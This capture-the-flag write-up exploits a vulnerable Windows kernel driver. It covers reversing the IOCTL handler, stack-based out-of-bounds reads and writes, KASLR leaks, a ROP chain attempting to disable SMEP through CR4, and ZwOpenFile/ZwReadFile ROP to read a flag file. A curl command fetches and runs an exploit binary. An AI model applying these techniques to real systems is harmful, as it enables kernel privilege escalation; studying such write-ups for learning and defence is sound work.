Rating: 5.0
## Pwn - Breath of Shadow
The goal is to pwn a driver running on Windows 10. We are given a .sys file and
a Windows 10 virtual machine image with this driver configured to start
automatically. While locally we can use VNC to connect and login as a privileged
user, we can only access the server via netcat, which will drop us into
`cmd.exe` running as a low integrity process. We will be able to use `curl` to
download the exploit to writable `tmp` directory and run it from there, but
that's about it.
To go forward with the analysis, we need two things:
* Kernel image: start [`pyftpdlib`](https://pypi.org/project/pyftpdlib/) on the
host, [`WinSCP`](https://winscp.net) in the guest, upload
* Debugger: [qemu gdbstub](https://wiki.qemu.org/Features/gdbstub) - add `-s`
to `run.sh` (while at it, `-vga vmware` might also be useful), then run `gdb -ex
'target remote localhost:1234'`.
Now we are ready, let's start by checking out the driver:
__int64 __fastcall DriverInit(PDRIVER_OBJECT DriverObject)
status = IoCreateDevice(DriverObject, 0, &DeviceName, 0x22u, 0x100u, 0, &DeviceObject);
if ( NT_SUCCESS(status) )
DeviceObject->MajorFunction[IRP_MJ_CREATE] = IrpMjCreateClose;
DeviceObject->MajorFunction[IRP_MJ_CLOSE] = IrpMjCreateClose;
DeviceObject->MajorFunction[IRP_MJ_DEVICE_CONTROL] = IrpMjDeviceControl;
DeviceObject->DriverUnload = DriverUnload;
RtlInitUnicodeString(&DestinationString, L"\\DosDevices\\BreathofShadow");
status = IoCreateSymbolicLink(&DestinationString, &DeviceName);
DeviceObject->Flags |= DO_DIRECT_IO;
DeviceObject->Flags &= ~DO_DEVICE_INITIALIZING;
seed = KeQueryTimeIncrement();
v4 = (unsigned __int64)(unsigned int)RtlRandomEx(&seed) << 32;
v5 = RtlRandomEx(&seed);
v3 = "Enable Breath of Shadow Encryptor\n";
key = v4 | v5;
It starts with the usual [`DEVICE_OBJECT`](
) creation dance:
* Call [`IoCreateDevice`](
) to instantiate it.
* Fill `MajorFunction` array with callbacks:
* `IRP_MJ_CREATE` is called when we use `CreateFile` on a device.
* `IRP_MJ_DEVICE_CONTROL` is called when we use `DeviceIoControl`.
* `IRP_MJ_CLOSE` is called when we use `CloseHandle`.
* Set `DriverUnload` callback. That one is fairly self-explaining.
* Call [`IoCreateSymbolicLink`](
) in order to expose the device under the name `\DosDevices\BreathofShadow`
(Windows, just like any other self-respecting operating system, has a [single
under which we can find our files, devices, and all the other stuff).
* Indicate that the device will talk to userspace using [Direct I/O](
* Indicate that we've done initializing the device, and it can now be interacted
At the end we initialize a global 64-bit variable with random data and tell the
world that the mighty Breath of Shadow Encryptor is at our disposal.
`IrpMjCreateClose` and `DriverUnload` are predictably uninteresting. All the
action is happening in `IrpMjDeviceControl`:
__int64 __fastcall IrpMjDeviceControl(__int64 DeviceObject, struct _IRP *Irp)
IoStackLocation = IoGetCurrentIrpStackLocation(Irp);
if ( IoStackLocation )
if ( *(_DWORD *)(v4 + IoStackLocation) == 0x9C40240B )
DbgPrint("Breath of Shadow Encryptor\n");
v3 = DoDeviceControl(Irp, IoStackLocation);
`24` is the offset of [`IO_STACK_LOCATION.DeviceIoControl.IoControlCode`](
), so now we know the ioctl command to send: `0x9C40240B`.
__int64 __fastcall DoDeviceControl(__int64 Irp, __int64 IoStackLocation)
Type3InputBuffer = *(__m128i **)(IoStackLocation + 32);
InputBufferLength = *(unsigned int *)(IoStackLocation + 16);
OutputBufferLength = *(unsigned int *)(IoStackLocation + 8);
if ( !Type3InputBuffer )
return 0xC0000001i64;
memset((__m128 *)CryptoBuffer, 0, 0x100ui64);
ProbeForRead(Type3InputBuffer, 0x100ui64, 1u);
memcpy((__m128i *)CryptoBuffer, Type3InputBuffer, InputBufferLength);
for ( i = 0; i < InputBufferLength >> 3; ++i )
CryptoBuffer[i] ^= key;
ProbeForWrite(Type3InputBuffer, 0x100ui64, 1u);
memcpy(Type3InputBuffer, CryptoBuffer, OutputBufferLength);
return 0i64;
Well, this is ["shoot me in the face"](https://youtu.be/GkQCAHwz9W0?t=6) kind of
thing - two very straightforward OOB errors, which allow us to read from and to
write to the stack. To add insult to injury, the code uses Neither I/O via
`Type3InputBuffer`, which points directly to userspace, instead of the promised
Direct I/O, which would require [dancing with MDLs](
Exploitation plan:
* `DeviceIoControl(InputBufferLength=InputBufferLength=0x100)` in order to
figure out the value of the xor key.
* `DeviceIoControl(InputBufferLength=0, OutputBufferLength>0x100)` in order to
read the stack.
* `DeviceIoControl(InputBufferLength>0x100, OutputBufferLength=0)` in order to
overwrite the stack and control the value of `RIP`.
By analyzing the assembly code we can learn the stack layout:
* `0x0`: `CryptoBuffer`.
* `0x100`: Security cookie - will end up being useless very soon.
* `0x128`: return to `IrpMjDeviceControl+0x5a` - now we know the driver
load address.
* `0x158`: return to somewhere in the kernel.
We don't know where the kernel and the stack are, but this is enough information
to set meaningful breakpoints. Let's stop at `DoDeviceControl + 0x103` (that's
the `ret` instruction we plan to control) and check out the stack again:
host$ python3 -m http.server &
host$ x86_64-w64-mingw32-gcc -o exploit.exe exploit.c
host$ nc localhost 50216
c:\ctf> cd tmp
c:\ctf\tmp> curl http://<host ip>:8000/exploit.exe -o exploit.exe
c:\ctf\tmp> exploit.exe /scout
Key: 0x6c3bae58430487b4
Driver base: 0xfffff8035ddd1000
(gdb) b *(0xfffff8035ddd1000+0x140005103-0x140001000)
(gdb) c
c:\ctf\tmp> exploit.exe /scout
(gdb) p/x $rsp
Let's scan the stack for stack addresses:
(gdb) python
addr = 0xfffff68e9e3697e8
import struct
i = gdb.inferiors()[0]
while True:
val, = struct.unpack('<Q', i.read_memory(addr, 8))
if val >= 0xfffff68e00000000 and val < 0xfffff68f00000000:
print(hex(addr) + ' ' + hex(val))
addr += 8
0xfffff68e9e369860 0xfffff68e9e369b80
So here it is - a pointer to `CryptoBuffer+0x4c0` at offset
`CryptoBuffer+0x158` - hooray, we can have the stack address now as well! Since
each thread has a fixed kernel stack, we can be sure that the value obtained
this way will persist across multiple `DeviceIoControl` calls.
Let's check out the mysterious kernel return address:
(gdb) x/a $rsp+0x30
0xfffff68e9e369818: 0xfffff80358a31f39
(gdb) x/2i 0xfffff80358a31f39
0xfffff80358a31f39: add $0x38,%rsp
0xfffff80358a31f3d: retq
(gdb) x/8bx 0xfffff80358a31f39
0xfffff80358a31f39: 0x48 0x83 0xc4 0x38 0xc3 0x0f 0xb6 0x40
This byte sequence is something we can look up in `ntoskrnl.exe`:
.text:0000000140031EE0 IofCallDriver proc near
.text:0000000140031F39 add rsp, 38h
.text:0000000140031F3D retn
Looks plausible - we can declare victory on KASLR now. How can we exploit? Now
that we know xor key, rsp and security cookie value, we can jump anywhere, but
where to?
First attempt: create a ROP chain to disable [SMEP](
) and then jump to userspace executable shellcode buffer. `ntoskrnl.exe` is a
trove of ROP gadgets of all shapes and sizes, and [ROPgadget](
) can gives us all of them!
Buf[pos++] = (KernelBase + 0x14001FC39 - 0x140001000); /* pop rcx ; ret */
Buf[pos++] = 0x406f8; /* cr4 value */
Buf[pos++] = (KernelBase + 0x14017ae47 - 0x140001000); /* mov cr4, rcx ; ret */
) again? Apparently in the meantime PatchGuard has been trained to detect CR4
modifications. Tough luck.
Attempt 2: use ROP chain to call [`ZwOpenFile`](
) in order to create a userspace handle for `c:\flag.txt` and then, since we
have messed the kernel stack up beyond repair, don't even think about returning
to userspace, but rather park the thread in an endless loop - thanks to kernel
preemption the system remains operational. We can forge `ZwOpenFile` arguments
on the stack next to the ROP chain.
After countless crashes, four lessons were learned:
* Check layout of function arguments 7 times. Set a breakpoint in order to
inspect how they look like during normal system operation.
* Don't put said arguments (and anything at all) above the stack pointer -
interrupt handlers will mess them up.
* Align stack to 16 bytes before calling functions, or else `MOVDQA` and friends
will throw up.
* `ZwOpenFile` can create only kernel handles.
These crashes were also somewhat hard to debug. Normally one configures Windows
to generate `MEMORY.DMP` containing kernel memory, ensures there is enough disk
space (`qemu-img resize` + `diskmgmt.msc` to the rescue) and that swap is on,
installs [WinDbg](
) and meditates on the output of `!analyze -v`. Unfortunately, for whatever
reason, `MEMORY.DMP` was generated only once, and the following gdb script had
to be used for tracing for the rest of the session instead:
(gdb) set logging redirect on
(gdb) set logging overwrite on
(gdb) set pagination off
(gdb) set logging on
while True:
gdb.execute('x/i $pc')
gdb.execute('info registers')
So, there appears to be no easy way to forge userspace handles. Messing with
credentials sounds even more complicated, so attempt 3 is: `ZwReadFile` +
`memmove` into user space buffer, which is periodically read by a separate
thread. In theory this should not be possible due to [`SMAP`](
), however, the driver gets a `Type3InputBuffer`, for which, apparently, an
exception is made.
Another seemingly endless series of crashes teaches us the following:
* It's better to generate longer ROP sequences in two passes in order to avoid
manually computing offsets.
* If a function writes its result to memory (looking at you,
`ZwOpenFile.FileHandle`) and another function wants this value as a register
argument, don't rush to look for dereference gadgets - if stack address is
known, just make the first function write the value directly into the
corresponding second function's ROP slot.
This time the exploit works and prints the flag!